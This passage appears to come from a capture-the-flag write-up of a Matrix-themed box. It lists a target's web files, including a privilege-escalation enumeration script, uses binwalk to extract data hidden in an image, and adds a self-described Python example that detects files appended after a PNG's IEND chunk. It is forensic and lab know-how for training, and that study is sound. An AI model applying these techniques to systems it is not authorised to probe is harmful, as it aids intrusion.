-rw-r--r-- 1 www-data www-data  348 Oct 28  2021 index.html
-rwxr-xr-x 1 www-data www-data 315K Apr 30 08:05 linpeas_base.sh
-rw-r--r-- 1 www-data www-data   47 Oct 28  2021 robots.txt
-rw-r--r-- 1 www-data www-data  44K Oct 28  2021 trinity.jpeg

Download it and save it as neo.png

Inspect the file

┌──(root㉿kali)-[~/tools/images]
└─# binwalk neo.png                         

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 853 x 480, 8-bit/color RGBA, non-interlaced
138           0x8A            Zlib compressed data, best compression

A bundled file is present

┌──(root㉿kali)-[~/tools/images]
└─# binwalk -e neo.png --run-as=root
┌──(root㉿kali)-[~/tools/images]
└─# ls
neo.png  _neo.png.extracted

┌──(root㉿kali)-[~/tools/images]
└─# cd _neo.png.extracted

┌──(root㉿kali)-[~/tools/images/_neo.png.extracted]
└─# ls
8A  8A.zlib

There is hidden data; view it in WinHex

The tail ends in AE 42 60 82, so it is most likely a PNG file. I got stuck at this point.
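The four bytes AE 42 60 82 are the CRC of the IEND chunk: IEND has no data, so its CRC is always crc32("IEND"), and the complete 12-byte tail 00 00 00 00 49 45 4E 44 AE 42 60 82 marks where a PNG ends. That makes a chunk walk the natural next step when an image is suspected of carrying a file: parse the chunks, check each CRC, and look at whatever follows IEND. The following is an added example, not part of the write-up; the carrier image and the PNG appended behind it are constructed in the code, and nothing here is taken from the box's neo.png.

```python
import struct
import zlib
from typing import List, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# IEND carries no data, so its CRC is always crc32(b"IEND") = AE 42 60 82:
# the four bytes the write-up spots at the end of the extracted blob.
PNG_TAIL = b"\x00\x00\x00\x00IEND\xaeB`\x82"

Chunk = Tuple[str, int, int, bool]   # (type, offset, data length, crc ok)


def walk_png(data: bytes) -> Tuple[List[Chunk], bytes]:
    """Walk chunks from the signature to IEND.

    Returns the chunk list and whatever bytes follow IEND; a well-formed
    image has none, so a non-empty trailer is the first thing to inspect
    when an image is suspected of hiding a file.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    chunks: List[Chunk] = []
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc
        chunks.append((ctype.decode("ascii"), pos, length, crc_ok))
        pos = end
        if ctype == b"IEND":
            return chunks, data[pos:]
    raise ValueError("no IEND chunk found")


def looks_like_png_tail(blob: bytes) -> bool:
    """The heuristic used in the write-up, made explicit."""
    return blob.endswith(PNG_TAIL)


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(width: int = 4, height: int = 2, trailer: bytes = b"") -> bytes:
    """Constructed RGBA image (not the box's neo.png); 'trailer' is appended
    after IEND to stand in for a file hidden behind the picture."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    rows = []
    for y in range(height):
        row = bytearray(b"\x00")               # filter type 0 (None)
        for x in range(width):
            row += bytes([x * 40, y * 100, 128, 255])
        rows.append(bytes(row))
    idat = zlib.compress(b"".join(rows), 9)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + trailer)


if __name__ == "__main__":
    hidden = build_sample_png(2, 2)
    carrier = build_sample_png(4, 2, trailer=hidden)
    chunks, trailer = walk_png(carrier)
    for ctype, off, length, ok in chunks:
        print(f"{ctype} @ {off:#06x} len={length} crc_ok={ok}")
    print(f"{len(trailer)} trailing bytes; PNG tail: {looks_like_png_tail(trailer)}")
```

Note what binwalk reported above: the zlib stream at 0x8A is the image's own IDAT payload (every PNG has one), so finding it proves nothing by itself; data after IEND, a second PNG signature, or an IDAT whose CRC fails are the signals worth acting on.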

IV. Open questions

References
红队笔记 (Red Team Notes): https://www.bilibili.com/video/BV1dg411b74a/?spm_id_from=333.999.0.0

From: https://www.cnblogs.com/koka/p/17365446.html
